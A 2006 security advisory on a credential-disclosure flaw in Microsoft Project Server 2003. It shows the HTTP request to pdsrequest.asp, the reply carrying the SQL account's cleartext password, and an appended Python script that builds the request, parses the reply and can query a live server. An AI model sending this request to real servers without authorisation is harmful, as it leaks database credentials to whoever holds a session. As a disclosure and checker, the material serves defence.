Project Server 2003 - Credential Disclosure
- From: "Brett Moore" <brett.moore@xxxxxxxxxxxxxxxxxxxxxxx>
- Date: Fri, 15 Dec 2006 12:08:41 +1300
==============================================================
% Project Server 2003 - Credential Disclosure
% brett.moore@xxxxxxxxxxxxxxxxxxxxxxx
==============================================================
Microsoft Project Server 2003 implements a thick client
for some of its functionality. The thick client talks to
the server with XML requests sent over HTTP(S).
One of these requests returns the username and password
of the MSProjectUser account used to access the SQL
database, along with other system information. Any user
who holds a valid session and can send this request (or
who can observe the reply on the wire when plain HTTP is
used) therefore obtains the database credentials in
cleartext.
--------------------------------------------------------------
POST http://SERVER/projectserver/logon/pdsrequest.asp HTTP/1.0
Accept: */*
Accept-Language: en-nz
Pragma: no-cache
Host: SERVER
Content-length: 87
Proxy-Connection: Keep-Alive
Cookie: PjSessionID=<valid cookie>
<Request>
<GetInitializationData>
<Release>1</Release>
</GetInitializationData>
</Request>

<Reply>
<HRESULT>0</HRESULT>
<STATUS>0</STATUS>
<UserName>theuser</UserName>
<GetInitializationData>
<GetLoginInformation>
<DBType>0</DBType>
<DVR>{SQLServer}</DVR>
<DB>ProjectServer</DB>
<SVR>SERVER</SVR>
<ResGlobalID>1</ResGlobalID>
<ResGlobalName>resglobal</ResGlobalName>
<UserName>MSProjectUser</UserName> <----
<Password>sekretpass</Password> <----
<UserNTAccount>SERVER\USER</UserNTAccount>
</GetLoginInformation>
</Reply>
--------------------------------------------------------------
Some quick notes that mitigate this attack:
* The cookie must be a valid PjSessionID, which is obtained
via a login with a valid username and password.
* Since the thick client runs client side, any SQL it issues
can be manipulated by the user anyway.
* The MSProjectUser account should be a low-privilege
account anyway.
* Other undocumented or unauthorised requests may also be
possible through this method.
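The following script is an added example, not part of the original advisory and not Microsoft code. It builds the GetInitializationData request body shown in the transcript above, parses a reply of the same shape for the <GetLoginInformation> block, and reports whether a cleartext SQL password came back. The sample reply is constructed for offline use (it adds the closing </GetInitializationData> tag the transcript omits); the endpoint path and the PjSessionID cookie name are taken from the advisory, while the Content-Type header and the check_server helper are assumptions for use against a live server.

```python
"""Check whether a Project Server 2003 PDS endpoint returns the database
credentials in its GetInitializationData reply.

Added example, not part of the original advisory or of Microsoft's code.
The request body and reply layout follow the transcript in the advisory;
the sample reply below is constructed for offline use.
"""
import urllib.request
import xml.etree.ElementTree as ET

PDS_PATH = "/projectserver/logon/pdsrequest.asp"   # endpoint from the advisory

# Fields of <GetLoginInformation> worth reporting; <Password> is the leak.
LOGIN_FIELDS = ("DBType", "DVR", "DB", "SVR", "UserName", "Password", "UserNTAccount")


def build_request(release: int = 1) -> bytes:
    """Build the PDS GetInitializationData request body shown in the advisory."""
    root = ET.Element("Request")
    init = ET.SubElement(root, "GetInitializationData")
    ET.SubElement(init, "Release").text = str(release)
    return ET.tostring(root)


def parse_login_information(reply: bytes) -> dict:
    """Extract the <GetLoginInformation> block from a PDS reply.

    Returns a dict of the fields that were present plus HRESULT/STATUS.
    Raises ValueError if the document is not a <Reply>.
    """
    root = ET.fromstring(reply)
    if root.tag != "Reply":
        raise ValueError(f"unexpected root element {root.tag!r}")
    info = {"HRESULT": root.findtext("HRESULT"), "STATUS": root.findtext("STATUS")}
    login = root.find(".//GetLoginInformation")   # nested, not the top-level <UserName>
    if login is None:
        return info
    for field in LOGIN_FIELDS:
        value = login.findtext(field)
        if value is not None:
            info[field] = value
    return info


def leaks_password(reply: bytes) -> bool:
    """True if the reply carries a non-empty SQL password in cleartext."""
    return bool(parse_login_information(reply).get("Password"))


def check_server(base_url: str, session_cookie: str, timeout: float = 10) -> dict:
    """Send the request to a live server (hypothetical helper; not run offline).

    base_url is e.g. "https://SERVER"; session_cookie is a valid PjSessionID
    obtained by logging in, as the advisory notes. Use HTTPS so the reply,
    which may contain the password, is not also exposed on the wire.
    The Content-Type header is an assumption; the advisory does not show one.
    """
    req = urllib.request.Request(
        base_url.rstrip("/") + PDS_PATH,
        data=build_request(),
        headers={"Content-Type": "text/xml",
                 "Cookie": f"PjSessionID={session_cookie}"},
        method="POST",
    )
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return parse_login_information(resp.read())


# Constructed sample reply in the shape of the advisory's transcript (with
# the closing </GetInitializationData> tag the transcript omits).
SAMPLE_REPLY = b"""<Reply>
<HRESULT>0</HRESULT>
<STATUS>0</STATUS>
<UserName>theuser</UserName>
<GetInitializationData>
<GetLoginInformation>
<DBType>0</DBType>
<DVR>{SQLServer}</DVR>
<DB>ProjectServer</DB>
<SVR>SERVER</SVR>
<ResGlobalID>1</ResGlobalID>
<ResGlobalName>resglobal</ResGlobalName>
<UserName>MSProjectUser</UserName>
<Password>sekretpass</Password>
<UserNTAccount>SERVER\\USER</UserNTAccount>
</GetLoginInformation>
</GetInitializationData>
</Reply>"""

if __name__ == "__main__":
    info = parse_login_information(SAMPLE_REPLY)
    print("request body:", build_request().decode())
    print("leaks password:", leaks_password(SAMPLE_REPLY))
    print("SQL login:", info.get("UserName"), "on", info.get("SVR"), "/", info.get("DB"))
```

Run stand-alone it reports on the constructed reply; against a real server, call check_server("https://SERVER", "<valid cookie>") with a PjSessionID from a normal login and treat any non-empty Password field as confirmation that the server is affected.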
==============================================================
%
==============================================================